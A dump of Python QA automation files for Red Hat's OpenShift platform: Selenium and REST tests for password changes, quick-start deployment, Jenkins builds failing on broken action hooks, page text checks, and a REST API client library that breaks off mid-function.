"src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135711(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n \n def test_u_s1797135711(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n baseutils.go_to_account_page(self)\n\n driver.find_element_by_link_text(\"Change password...\").click()\n baseutils.wait_element_present_by_id(self,\"web_user_submit\")\n self.assertEqual(\"OpenShift by Red Hat | OpenShift Change Password\", driver.title)\n\n driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(self.cfg.password)\n driver.find_element_by_id(\"web_user_password\").clear()\n new_password=\"abcabc\"\n driver.find_element_by_id(\"web_user_password\").send_keys(new_password)\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"%s\\t\"%new_password)\n\n driver.find_element_by_id(\"web_user_submit\").click()\n baseutils.wait_element_present_by_link_text(self,\"Change password...\")\n self.assertEqual(\"OpenShift by Red Hat | My Account\", driver.title)\n\n baseutils.logout(self)\n baseutils.login(self,self.cfg.new_user, new_password)\n\n #and put it back\n baseutils.go_to_account_page(self)\n baseutils.wait_element_present_by_link_text(self,\"Change password...\")\n driver.find_element_by_link_text(\"Change password...\").click()\n\n baseutils.wait_element_present_by_id(self,\"web_user_submit\")\n self.assertEqual(\"OpenShift by Red Hat | OpenShift Change Password\", driver.title)\n driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(new_password)\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(self.cfg.password)\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"%s\\t\"%self.cfg.password)\n driver.find_element_by_id(\"web_user_submit\").click()\n baseutils.wait_element_present_by_link_text(self,\"Change password...\")\n #and we should be back at my_account page\n self.assertEqual(\"OpenShift by Red Hat | My Account\", driver.title)\n\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.6991084814071655, "alphanum_fraction": 0.6991084814071655, "avg_line_length": 34.421051025390625, "blob_id": "cff02519d1bc1eccaec61d454fd43f7b9874f3ac", "content_id": "d3a77aefe421b88b96efd96fa4f41b4c857fc4f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1346, "license_type": "no_license", "max_line_length": 226, "num_lines": 38, "path": "/automation/open/testmodules/RT/quick_start/quick_start_flask_mongo.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", 
"text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartMongoFlask(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"python\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types['mongodb'] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Mongo Flask\"\n self.config.git_upstream_url = \"git://github.com/openshift/openshift-mongo-flask-example.git\"\n self.config.page = \"ws/parks\"\n self.config.page_pattern = \"Aztec Ruins National Monument\"\n\n def post_deployment_steps(self):\n common.run_remote_cmd(self.config.application_name, \"mongoimport -d parks -c parkpoints --type json --file $OPENSHIFT_REPO_DIR/parkcoord.json -h $OPENSHIFT_MONGODB_DB_HOST -u admin -p $OPENSHIFT_MONGODB_DB_PASSWORD\")\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartMongoFlask)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5315574407577515, "alphanum_fraction": 0.546356737613678, "avg_line_length": 43.69260787963867, "blob_id": "7ea22e2d3bc4e5e417f905badcd6ecf5959cdfed", "content_id": "1b0fa9f87a80a02938ce5edefb3cd7f0fca219a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11487, "license_type": "no_license", "max_line_length": 227, "num_lines": 257, "path": "/automation/open/testmodules/RT/cartridge/jenkins_job_upon_fail_build.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1178 & US1034] [rhc-cartridge] check jenkins functionality upon failed build\nhttps://tcms.engineering.redhat.com/case/122368/\n\"\"\"\nimport os, sys\nimport rhtest\nimport testcase, common, OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary =\"[US1178 & US1034] [rhc-cartridge] check jenkins functionality upon failed build\"\n try:\n test_name = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php`\")\n test_name='php'\n\n testname_to_file = { \"php\" : \"php/index.php\",\n \"rack\" : \"config.ru\",\n \"wsgi\" : \"wsgi/application\",\n \"python\" : \"wsgi/application\",\n \"perl\" : \"perl/index.pl\",\n \"jbossas\" : \"src/main/webapp/index.html\"}\n testname_to_file[\"zend\"] = testname_to_file[\"php\"]\n testname_to_file[\"ruby-1.9\"] = testname_to_file[\"rack\"]\n\n self.app_type = common.app_types[test_name]\n self.target_file = testname_to_file[test_name]\n self.app_name = test_name + \"jenkinsfail\"\n self.jenkins_name = \"jenkins\"\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass JenkinsJobUponFailBuild(OpenShiftTest):\n def test_method(self):\n # 1.\n self.steps_list.append(testcase.TestCaseStep(\"Create a jenkins app\",\n common.create_app,\n function_parameters=[self.jenkins_name, \n \"jenkins-1.4\", \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False],\n expect_description=\"Jenkins app created success\",\n expect_return=0,\n expect_string_list=['Jenkins created successfully']))\n \n # 2.\n 
self.steps_list.append(testcase.TestCaseStep(\"Create an application of %s type\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"app created success\",\n expect_return=0))\n\n # 3.\n self.steps_list.append(testcase.TestCaseStep(\"Embed jenkins client to app\",\n common.embed,\n function_parameters=[self.app_name, 'add-jenkins-client-1.4', self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_string_list=['Jenkins client 1.4 has been added to %s' %(self.app_name)],\n expect_description=\"Embed jenkins to app success\",\n expect_return=0,\n try_count=3,\n try_interval=5))\n # 4.\n self.steps_list.append(testcase.TestCaseStep(\"Got jenkins app url\",\n OSConf.get_app_url,\n function_parameters=[self.jenkins_name]))\n\n # 5.\n self.steps_list.append(testcase.TestCaseStep(\"Got app url\",\n OSConf.get_app_url,\n function_parameters=[self.app_name]))\n\n # 6.\n self.steps_list.append(testcase.TestCaseStep(\"Do some change to app's index page\",\n \"sed -i 's/Welcome to OpenShift/Welcome~~~/g' %s/%s \" %(self.app_name, self.target_file),\n expect_return=0,))\n\n # 7.\n self.steps_list.append(testcase.TestCaseStep(\"Modify .openshift/action_hooks/pre_build\",\n \"\"\"echo -e '#! /bin/bash\\necho \"----Pre_Build Fail Test----\"\\nexit 1' >%s/.openshift/action_hooks/pre_build; \\n chmod +x %s/.openshift/action_hooks/pre_build\"\"\" %(self.app_name, self.app_name),\n expect_return=0))\n # 8.\n self.steps_list.append(testcase.TestCaseStep(\"Triger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name, 1],\n expect_return=False))\n\n # 9.\n self.steps_list.append(testcase.TestCaseStep(\"Get jenkins username and password\",\n self.get_jenkins_username_password,\n function_parameters=[OSConf.default, self.jenkins_name]))\n # 10.\n self.steps_list.append(testcase.TestCaseStep(\"Check output console of jenkins job\",\n \"curl -s -k -u __OUTPUT__[9][0]:__OUTPUT__[9][1] -H 'Pragma: no-cache' https://__OUTPUT__[4]/job/%s-build/1/console\" %(self.app_name),\n expect_return=0,\n expect_string_list=['----Pre_Build Fail Test----'],\n try_count=4,\n try_interval=10))\n # 11.\n self.steps_list.append(testcase.TestCaseStep(\"Check output of app\",\n \"curl -s -H 'Pragma: no-cache' __OUTPUT__[5]\",\n expect_return=0,\n expect_string_list=['Welcome to OpenShift'],\n unexpect_string_list=['Welcome~~~'],\n try_count=4,\n try_interval=10))\n\n # 12.\n self.steps_list.append(testcase.TestCaseStep(\"Restore .openshift/action_hooks/pre_build\",\n \"rm %s/.openshift/action_hooks/pre_build\" %(self.app_name),\n expect_return=0))\n\n # 13.\n self.steps_list.append(testcase.TestCaseStep(\"Modify .openshift/action_hooks/build\",\n \"\"\"echo -e '#/bin/bash\\necho \"----Build Fail Test----\"\\nexit 1' >%s/.openshift/action_hooks/build; \\n chmod +x %s/.openshift/action_hooks/build\"\"\" %(self.app_name, self.app_name),\n expect_return=0))\n\n # 14.\n self.steps_list.append(testcase.TestCaseStep(\"Triger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name, 1],\n expect_return=False))\n\n # 15.\n self.steps_list.append(testcase.TestCaseStep(\"Check output console of jenkins job\",\n \"curl -s -k -u __OUTPUT__[9][0]:__OUTPUT__[9][1] -H 'Pragma: no-cache' https://__OUTPUT__[4]/job/%s-build/2/console\" %(self.app_name),\n expect_return=0,\n expect_string_list=['----Build Fail Test----'],\n 
try_count=4,\n try_interval=10))\n\n # 16.\n self.steps_list.append(testcase.TestCaseStep(\"Check output of app\",\n \"curl -s -H 'Pragma: no-cache' __OUTPUT__[5]\",\n expect_return=0,\n expect_string_list=['Welcome to OpenShift'],\n unexpect_string_list=['Welcome~~~'],\n try_count=4,\n try_interval=10))\n\n # 17.\n self.steps_list.append(testcase.TestCaseStep(\"Restore .openshift/action_hooks/build\",\n \"rm %s/.openshift/action_hooks/build\" %(self.app_name),\n expect_return=0))\n\n # 18.\n self.steps_list.append(testcase.TestCaseStep(\"Modify .openshift/action_hooks/deploy\",\n \"\"\"echo -e '#!/bin/bash\\necho \"----Deploy Fail Test----\"\\nexit 1' >%s/.openshift/action_hooks/deploy; \\n chmod +x %s/.openshift/action_hooks/deploy\"\"\" %(self.app_name, self.app_name),\n expect_return=0,))\n\n # 19.\n self.steps_list.append(testcase.TestCaseStep(\"Trigger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name, 1],\n expect_return=False))\n\n # 20.\n self.steps_list.append(testcase.TestCaseStep(\"Check output console of jenkins job\",\n \"curl -s -k -u __OUTPUT__[9][0]:__OUTPUT__[9][1] -H 'Pragma: no-cache' https://__OUTPUT__[4]/job/%s-build/3/console\" %(self.app_name),\n expect_return=0,\n expect_string_list=['----Deploy Fail Test----'],\n try_count=4,\n try_interval=10))\n\n # 21.\n self.steps_list.append(testcase.TestCaseStep(\"Check output of app\",\n \"curl -s -H 'Pragma: no-cache' __OUTPUT__[5]\",\n expect_return=0,\n expect_string_list=['503 Service Temporarily Unavailable'],\n unexpect_string_list=['Welcome~~~', 'Welcome to OpenShift'],\n try_count=4,\n try_interval=10))\n # 22.\n self.steps_list.append(testcase.TestCaseStep(\"Restore .openshift/action_hooks/deploy\",\n \"rm %s/.openshift/action_hooks/deploy\" %(self.app_name),\n expect_return=0))\n\n # 23.\n self.steps_list.append(testcase.TestCaseStep(\"Modify .openshift/action_hooks/post_deploy\",\n \"\"\"echo -e '#!/bin/bash\\necho \"----Post_Deploy Fail Test----\"\\nexit 1' >%s/.openshift/action_hooks/post_deploy; \\n chmod +x %s/.openshift/action_hooks/post_deploy\"\"\" %(self.app_name, self.app_name),\n expect_return=0))\n\n # 24.\n self.steps_list.append(testcase.TestCaseStep(\"Trigger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name, 1],\n expect_return=False))\n # 25.\n self.steps_list.append(testcase.TestCaseStep(\"Check output console of jenkins job\",\n \"curl -s -k -u __OUTPUT__[9][0]:__OUTPUT__[9][1] -H 'Pragma: no-cache' https://__OUTPUT__[4]/job/%s-build/4/console\" %(self.app_name),\n expect_return=0,\n expect_string_list=['----Post_Deploy Fail Test----'],\n try_count=4,\n try_interval=10))\n\n # 26.\n self.steps_list.append(testcase.TestCaseStep(\"Check output of app\",\n \"curl -s -H 'Pragma: no-cache' __OUTPUT__[5]\",\n expect_return=0,\n expect_string_list=['Welcome~~~'],\n unexpect_string_list=['Welcome to OpenShift'],\n try_count=4,\n try_interval=30))\n\n # 27.\n self.steps_list.append(testcase.TestCaseStep(\"Restore .openshift/action_hooks/post_deploy\",\n \"rm %s/.openshift/action_hooks/post_deploy\" %(self.app_name),\n expect_return=0))\n\n # 28.\n self.steps_list.append(testcase.TestCaseStep(\"Trigger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name,],\n expect_return=True))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return 
self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def get_jenkins_username_password(self, user, jenkins_name):\n return (user.conf[\"apps\"][jenkins_name][\"username\"], user.conf[\"apps\"][jenkins_name][\"password\"])\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsJobUponFailBuild)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6393781304359436, "alphanum_fraction": 0.6628203392028809, "avg_line_length": 60.43283462524414, "blob_id": "6f1c73a54d1c12668c55d0e40e2a5da08463f44a", "content_id": "db3a16ffe945b600133dc4ce4fac05331ca83d18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8233, "license_type": "no_license", "max_line_length": 808, "num_lines": 134, "path": "/automation/open/testmodules/UI/web/case_122353.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122353.py\n# Date: 2012/07/24 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Check_platform(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_platform()\n \n #Assert all the elements on platform page.\n web.assert_text_equal_by_css('''About the OpenShift Platform as a Service (PaaS)''',\n '''div.ribbon-content''')\n \n web.assert_text_equal_by_xpath('''OpenShift takes care of all the infrastructure, middleware, and management and allows the developer to focus on what they do best: designing and coding applications.''', '''//div[@id='node-11589']/div/p[2]''')\n \n web.assert_text_equal_by_xpath('How do I use OpenShift?', '''//div[@id='node-11589']/div/h2''')\n \n web.assert_text_equal_by_xpath('For a Developer to use OpenShift to take advantage of the power and elasticity of the Cloud, they need only do the following:',\n '''//div[@id='node-11589']/div/p[3]''')\n \n web.assert_text_equal_by_xpath('''Create an \"Application\" in OpenShift (With the command-line or via their IDE)''',\n '''//div[@id='node-11589']/div/ol/li''')\n \n web.assert_text_equal_by_xpath('Code the application (in Vi, TextMate, Eclipse, Visual Studio, or whatever)',\n '''//div[@id='node-11589']/div/ol/li[2]''')\n \n web.assert_text_equal_by_xpath('''Push the application code to OpenShift (again, with the command-line or from their IDE)''',\n '''//div[@id='node-11589']/div/ol/li[3]''')\n \n web.assert_text_equal_by_xpath('''Here's an example of the command-line approach (in this case the application was already coded and resident in the github repository):''',\n '''//div[@id='node-11589']/div/p[4]''')\n \n web.assert_text_equal_by_xpath('''That's all there is to it. Simple, right?''',\n '''//div[@id='node-11589']/div/p[5]''')\n \n web.assert_text_equal_by_xpath('Read more about getting started',\n '''//div[@id='node-11589']/div/p[6]/a''')\n \n web.assert_text_equal_by_xpath('Code anything',\n '''//div[@id='node-11589']/div/h2[2]''')\n \n web.assert_text_equal_by_xpath('''OpenShift takes a No-Lock-In approach to PaaS by providing built-in support for Node.js, Ruby, Python, PHP, Perl, and Java (the standard in today's Enterprise). 
In addition, OpenShift is extensible with a customizable cartridge functionality that allows enterprising developers to add any other language they wish. We've seen everything from Clojure to Cobol running on OpenShift.''',\n '''//div[@id='node-11589']/div/p[7]''')\n \n web.assert_text_equal_by_xpath('''In addition to this flexible, no-lock-in, language approach, OpenShift supports many of the popular frameworks that make a developer's life easier including frameworks ranging from Spring, to Rails, to Play. OpenShift is designed to allow Developers to work the way they want to work by giving them the languages, frameworks and tools they need for fast and easy application development.''',\n '''//div[@id='node-11589']/div/p[8]''')\n \n web.assert_text_equal_by_xpath('Blow the doors off your expectations',\n '''//div[@id='node-11589']/div/h2[3]''')\n \n web.assert_text_equal_by_xpath('Once you have your application running in the Cloud, the next thing to worry about is how it is going to handle the massive amount of usage it gets when it goes viral. Well, no worries here. OpenShift has you covered.',\n '''//div[@id='node-11589']/div/p[9]''')\n \n web.assert_text_equal_by_xpath('With Auto-Scaling, OpenShift can scale your application by adding additional instances of your application and enabling clustering. Alternatively, you can manually scale the amount of resources with which your application is deployed when needed. When your big idea takes off, OpenShift will allow it to soar.',\n '''//div[@id='node-11589']/div/p[11]''')\n \n web.assert_text_equal_by_xpath('''Under the Hood''',\n '''//div[@id='node-11589']/div/h2[4]''')\n \n web.assert_text_equal_by_xpath('''OpenShift by Red Hat is built on open-source technologies (we are one of the world's leading open source companies, after all). A decade of enhancements in these technologies contributed by the open source community has resulted in a set of very robust technology components that provide the inner-workings of the OpenShift PaaS.''',\n '''//div[@id='node-11589']/div/p[12]''')\n \n web.assert_text_equal_by_xpath('''OpenShift is built on a foundation of Red Hat Enterprise Linux (RHEL). Beyond being a leading and well respected Linux distro, RHEL provides some key capabilities that allow OpenShift to be stable, responsive, performant and secure. OpenShift leverages the multitenancy and security models within RHEL to provide fine-grained and trusted control over the compute and storage resources available to any single OpenShift application. SELinux allows OpenShift to \"firewall\" one user's application from another in order to insure security and survivability. Taking a \"multi-tenant in the OS\" approach vs. a \"multi-tenant hypervisor\" approach allows OpenShift to scale resources much more quickly so that your application will never lack the horsepower that it needs.''',\n '''//div[@id='node-11589']/div/p[13]''')\n \n web.assert_text_equal_by_xpath('''Add on top of RHEL, a full selection of open source Languages, Frameworks, and Middleware combined with a \"Cartridge\" approach that allows users to very easily select the components that their applications need whether it is a NoSQL datastore or a Business Intelligence analytics engine.''',\n '''//div[@id='node-11589']/div/p[14]''')\n \n web.assert_text_equal_by_xpath('''Easy-peasy''',\n '''//div[@id='node-11589']/div/h2[5]''')\n \n web.assert_text_equal_by_xpath('''OpenShift is designed to provide one thing for Developers: Ease of Use without Worries. 
OpenShift's mission is to make your job easier by taking care of all the messy IT aspects of app development and allowing you to focus on your job: Coding your Application and satisfying your customers.''',\n '''//div[@id='node-11589']/div/p[15]''')\n \n web.assert_text_equal_by_xpath('''Pricing''',\n '''//div[@id='node-11589']/div/h2[6]''')\n \n web.assert_text_equal_by_xpath('''A free Developer Preview version of OpenShift has been available for the past year. Based on requests from users for expanded capability, we are planning to expand the OpenShift offering to provide users increased capacity, functionality and support. Check the OpenShift Pricing page for an overview of what we intend to offer when a paid OpenShift service becomes available.''',\n '''//div[@id='node-11589']/div/p[16]''')\n \n\n #check the links\n #Read more about getting started\n web.go_to_platform()\n web.click_element_by_xpath('''//div[@id='node-11589']/div/section/a/div''')\n time.sleep(2)\n web.check_title(\"Get Started with OpenShift | OpenShift by Red Hat\")\n \n #Read the Getting Started Guide\n web.go_to_platform()\n web.click_element_by_xpath('''//div[@id='node-11589']/div/section/a/div[2]''')\n web.check_title(\"Get Started with OpenShift | OpenShift by Red Hat\")\n \n self.tearDown()\n\n return self.passed(\"Case 122353 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Check_platform)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122353.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5428172945976257, "alphanum_fraction": 0.5506480932235718, "avg_line_length": 35.88074493408203, "blob_id": "d2d9694091cf75d63f2d7d6bd494f850ea79ce53", "content_id": "579ca0007e37d69bf0b3c3e999464ef692de8d65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33713, "license_type": "no_license", "max_line_length": 135, "num_lines": 914, "path": "/automation/open/lib/openshift.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nThis files contains utility classes that are Openshift related.\n\n\"\"\"\n\n#import urllib2 as urllib\nimport urllib\nimport socks\nimport httplib2\nimport base64\nimport os\nimport json\nimport exceptions\nimport sys\nfrom optparse import OptionParser\nfrom common import CONNECT_TIMEOUT\nimport time\nimport traceback\n\nimport clog\n\n\nclass OpenShiftException(exceptions.BaseException):\n pass\n\nclass OpenShiftLoginException(OpenShiftException):\n \"\"\"Authorization failed.\"\"\"\n pass\n\nclass OpenShiftNullDomainException(OpenShiftException):\n \"\"\"User's domain hasn't been initialized.\"\"\"\n pass\n\nclass OpenShift500Exception(OpenShiftException):\n \"\"\"Internal Server Error\"\"\"\n pass\n\n#### set this to True if we want to enable performance analysis\nDOING_PERFORMANCE_ANALYSIS=False\n\n\ndef config_parser():\n # these are required options.\n parser.set_defaults(VERBOSE=False)\n parser.set_defaults(DEBUG=False)\n parser.add_option(\"-d\", action=\"store_true\", dest=\"DEBUG\", help=\"enable DEBUG (default true)\")\n #parser.add_option(\"-a\", \"--action\", help=\"action you want to take (list|create|store)\")\n parser.add_option(\"-i\", \"--ip\", default=\"openshift.redhat.com\", 
help=\"ip addaress of your devenv\")\n parser.add_option(\"-v\", action=\"store_true\", dest=\"VERBOSE\", help=\"enable VERBOSE printing\")\n parser.add_option(\"-u\", \"--user\", default=None, help=\"User name\")\n parser.add_option(\"-p\", \"--password\", default=None, help=\"RHT password\")\n (options, args) = parser.parse_args()\n \n if options.user is None:\n options.user = os.getenv('OPENSHIFT_user_email')\n \n if options.password is None:\n options.password = os.getenv('OPENSHIFT_user_passwd')\n\n return options, args\n\n\nlog = clog.get_logger()\nparser = OptionParser()\n\n\n# helper function for to measure timedelta.\ndef timeit(method):\n\n def timed(*args, **kw):\n ts = time.time()\n result = method(*args, **kw)\n te = time.time()\n\n log.info(\"%r (%r, %r) %2.2f sec\" % (method.__name__, args, kw, te-ts))\n return result\n\n return timed\n\nclass conditional_decorator(object):\n def __init__(self, dec, condition):\n self.decorator = dec\n self.condition = condition\n\n def __call__(self, func):\n if not self.condition:\n return func\n else:\n return self.decorator(func)\n\nclass Response(object):\n \"\"\"\n A base Response class to derive from. Handle the JSON response from the\n REST API\n\n \"\"\"\n json = None\n body = None\n status = None\n headers = {}\n error = None\n url = None\n debug = False\n\n def __init__(self, response, body, base_url, debug=False):\n self.body = body\n self.status = response.status\n self.headers = response.items()# TODO: dict(response.getheaders())\n self.error = response.reason\n self.url = base_url\n self.parse_body()\n self.data = None\n\n def parse_body(self):\n \"\"\"\n call JSON library to translate string JSON response to a JSON object \n \"\"\"\n if len(self.body) > 2: # just in cases where API return just '{}'\n try:\n self.json = json.loads(self.body)\n except:\n return self.body\n\n # the acutal JSON response is key by the url (w/o the leading slash\n self.data =self.json['data']\n else:\n self.data = None\n\n if self.debug:\n self.pprint()\n\n return self.data\n\n def pprint(self): # pretty print\n \"\"\" do pretty print of JSON response \"\"\"\n print json.dumps(self.json, sort_keys=True, indent=2)\n\n def __unicode__(self):\n return self.pprint(self.json)\n\nclass RestApi(object):\n \"\"\"\n A base connection class to derive from.\n \"\"\"\n\n connection = None\n host = None\n port = (80, 443)\n secure = 1 # 0 or 1\n username = None\n password = None\n responseCls = Response\n headers = None\n response = None\n base_uri_root = '/broker/rest'\n base_uri = None\n verbose = False\n debug = False\n\n def __init__(self, host, port=80, username=username, password=password,\n debug=False, verbose=False, secure=True):\n self.host = host\n self.base_uri = 'https://%s/%s'%(host,self.base_uri_root)\n\n if username:\n self.username = username\n\n if password:\n self.password = password\n\n if verbose:\n self.verbose = verbose\n\n self.debug = debug\n\n proxy = None\n if os.getenv('http_proxy'):\n import re\n obj = re.search(r\"http://([^:]+):(\\d+)\", os.getenv('http_proxy'))\n if obj:\n proxy_host = obj.group(1)\n proxy_port =int(obj.group(2))\n proxy = httplib2.ProxyInfo(proxy_type=socks.PROXY_TYPE_HTTP, proxy_host=proxy_host, proxy_port=proxy_port)\n else:\n log.error(\"Warning: Wrong format of http_proxy!\")\n\n self.connection = httplib2.Http(cache=None, timeout=CONNECT_TIMEOUT, proxy_info=proxy, disable_ssl_certificate_validation=True)\n\n def connect(self, host=None, port=80, headers=None):\n if host:\n self.host = host\n\n if port:\n 
self.port = port \n else:\n self.port = self.port[self.secure]\n kwargs = {'host': host, 'port': port, 'timeout': CONNECT_TIMEOUT}\n connection = httplib2.Http(**kwargs)\n self.connection = connection\n return connection\n\n def _get_auth_headers(self, username=None, password=None):\n if username:\n self.username = username\n if password:\n self.password = password\n\n return {\n \"Content-type\": \"application/x-www-form-urlencoded\",\n 'Authorization':\n \"Basic %s\"\n % base64.b64encode('%s:%s' % (self.username, self.password)),\n 'Accept': 'application/json'\n }\n\n\n def request(self, url, method, headers=None, params=None):\n conn = self.connection\n if url.startswith(\"https://\") or url.startswith(\"http://\") :\n self.url = url\n else:\n self.url = self.base_uri + url\n\n log.debug(\"URL: %s\" % self.url)\n if self.headers is None:\n self.headers = self._get_auth_headers(self.username, self.password)\n else:\n self.headers.update(self._get_auth_headers(self.username, self.password))\n if headers is not None:\n self.headers.update(headers)\n\n response = None\n content = None\n try:\n if method == 'GET':\n (response, content) = conn.request(uri=self.url, method=method, headers=self.headers)\n else:\n (response, content) = conn.request(uri=self.url, method=method, body=params, headers=self.headers)\n\n except Exception as e:\n print >>sys.stderr, \"-\"*80\n traceback.print_exc(file=sys.stderr)\n print >>sys.stderr, \"-\"*80\n raise e\n\n raw_response = content\n self.response = Response(response, content, self.url)\n self.data = self.response.parse_body()\n\n # Workaround for bug 913796\n #add some debug messages if response is else than OK\n '''\n if self.response.error not in ('OK', 'Created', 'Not Content'):\n print >>sys.stderr, \"-\"*80\n log.debug(\"Response of non 'OK' [status/data]: %s/%s\"%(self.response.error, self.data))\n print >>sys.stderr, \"-\"*80\n '''\n if self.response.status == 200:\n status = 'OK'\n else:\n status = self.response.error\n return (status, raw_response)\n \n\n def GET(self, url):\n \"\"\" wrapper around request() \"\"\"\n url = self.base_uri\n res = self.request(url, method=\"GET\")\n return res\n\n def POST(self, data):\n \"\"\" do a REST API POST \"\"\"\n return self.connection.request(url=self.url, headers=self.headers, body=data, method='POST')\n \n def PUT(self, url, data):\n return self.connection.request(url=self.url, params=data, method='PUT')\n\nclass Openshift(object):\n \"\"\"\n wrappers class around REST API so use can use it with python\n \"\"\"\n rest = None\n user = None\n passwd = None\n def __init__(self, host, user=None, passwd=None, debug=False, verbose=False, logger=None):\n if user:\n self.user = user\n if passwd:\n self.passwd = passwd\n if logger:\n global log\n log = logger\n self.rest = RestApi(host=host, username=self.user, password=self.passwd, debug=debug, verbose=verbose)\n \n def get_href(self, top_level_url, target_link, domain_name=None):\n status, res = self.rest.request(method='GET', url=top_level_url)\n index = target_link.upper()\n if status == 'Authorization Required':\n #log.error(\"Authorization failed. 
(Check your credentials)\")\n raise OpenShiftLoginException('Authorization Required')\n\n if self.rest.response.json is None:\n raise OpenShift500Exception(status)\n\n if domain_name is None:\n if self.rest.response.json['data']:\n res = self.rest.response.json['data'][0]['links'][index]\n return (res['href'], res['method'])\n else:\n raise OpenShiftNullDomainException(\"No domain has been initialized.\")\n #return ('Not Found', self.rest.response.json)\n\n else: # domain name is specified, now find a match\n json_data = self.rest.response.json['data']\n if json_data:\n for jd in json_data:\n if jd['id'] == domain_name:\n res = jd['links'][index]\n return (res['href'], res['method'])\n ### if here, then user has given a domain name that does not match what's registered with the system\n return(\"Not Found\", None)\n else:\n return(None, None)\n \n ##### /user (sshkey)\n #@conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def get_user(self):\n log.debug(\"Getting user information...\")\n (status, raw_response) = self.rest.request(method='GET', url='/user')\n if status == 'OK':\n return (status, self.rest.response.json['data']['login'])\n else:\n return (status, raw_response)\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS) \n def keys_list(self):\n log.debug(\"Getting ssh key information...\")\n (status, raw_response) = self.rest.request(method='GET', url='/user/keys')\n return (status, raw_response)\n\n @conditional_decorator(timeit, DOING_PERFORMANCE_ANALYSIS)\n def key_add(self, kwargs):\n 